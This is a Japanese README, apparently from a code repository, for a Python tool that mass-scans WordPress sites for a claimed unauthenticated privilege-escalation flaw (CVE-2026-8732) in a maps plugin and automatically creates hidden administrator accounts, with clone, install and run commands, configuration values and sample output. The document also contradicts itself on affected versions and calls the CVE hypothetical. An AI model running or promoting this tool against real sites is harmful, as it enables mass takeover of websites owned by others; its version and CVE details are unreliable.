
WP Maps Pro <= 6.1.0 - wpgmp_temp_access_ajax AJAXアクションへの管理者アカウント作成による認証されていない権限昇格
このツールは、WordPress用プラグイン WP Google Map Pro の脆弱性 CVE-2026-8732 を悪用します。この脆弱性により、認証されていない攻撃者がAJAXエンドポイント(admin-ajax.php?action=wpgmp_temp_access_ajax)を介して有効な wpmp_token を取得できます。このトークンを使用すると、攻撃者はWordPress管理パネルにアクセスし、新しい管理者ユーザーを作成できます。
このツールは、ドメインのリストから マススキャン を実行し、nonceとトークンを抽出して、脆弱なサイトに隠し管理者アカウントを自動作成します。結果は完全なトークン情報とともにリアルタイムで保存されます。
⚠️ 免責事項: このツールは 教育目的および許可されたセキュリティテスト専用 です。所有しているシステム、またはテストする明示的な許可を得たシステムでのみ使用してください。作者は誤用について一切責任を負いません。
その他の免責事項は、Jenderal92のカバーにある免責事項を参照できます。こちら !!! から確認できます。
admin_created.txt に保存http:// と https:// の両方をサポートrequests ライブラリ必要なライブラリをインストール:
pip install requests
🚀 インストール
git clone https://github.com/Jenderal92/CVE-2026-8732.git
cd CVE-2026-8732
🎯 使い方
対象リストファイルを準備します(1行に1ドメイン):
example.com
https://target-website.com
http://vulnerable-site.org
スキャナーを実行:
python2 exploit.py targets.txt
出力ファイル
ファイル コンテンツ res.txt 完全なトークンとリダイレクトURL(存在する場合)を含む脆弱なドメイン admin_created.txt 正常に作成された管理者認証情報(ドメイン、ユーザー名、パスワード、メールアドレス)
出力例
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ 設定
スクリプト内の以下の変数を編集します:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 動作の仕組み
🛡️ 緩和策
· WP Google Map Pro を最新のパッチ適用済みバージョンに更新してください。 · カスタムコードまたはファイアウォールで AJAX アクション wpgmp_temp_access_ajax を無効にしてください。 · Web Application Firewall(WAF)を使用して、admin-ajax.php への悪意のあるリクエストをブロックしてください。
⭐ 免責事項
このソフトウェアは、いかなる種類の保証もなく「現状のまま」提供されます。ソフトウェアの品質と性能に関するすべてのリスクは利用者が負うものとします。責任を持って、テストを許可されたシステムでのみ使用してください。
| フィールド | 値 |
|---|
| CVE ID | CVE-2026-8732 (このプラグインの仮想的なもの) |
| 影響を受けるプラグイン | WP Google Map Pro (バージョン <= 1.5.0) |
| 脆弱性の種類 | アクセス制御の欠陥 / 権限昇格 |
| 攻撃ベクトル | 認証なし、リモート |
| 影響 | 管理者アカウント作成によるサイト完全乗っ取り |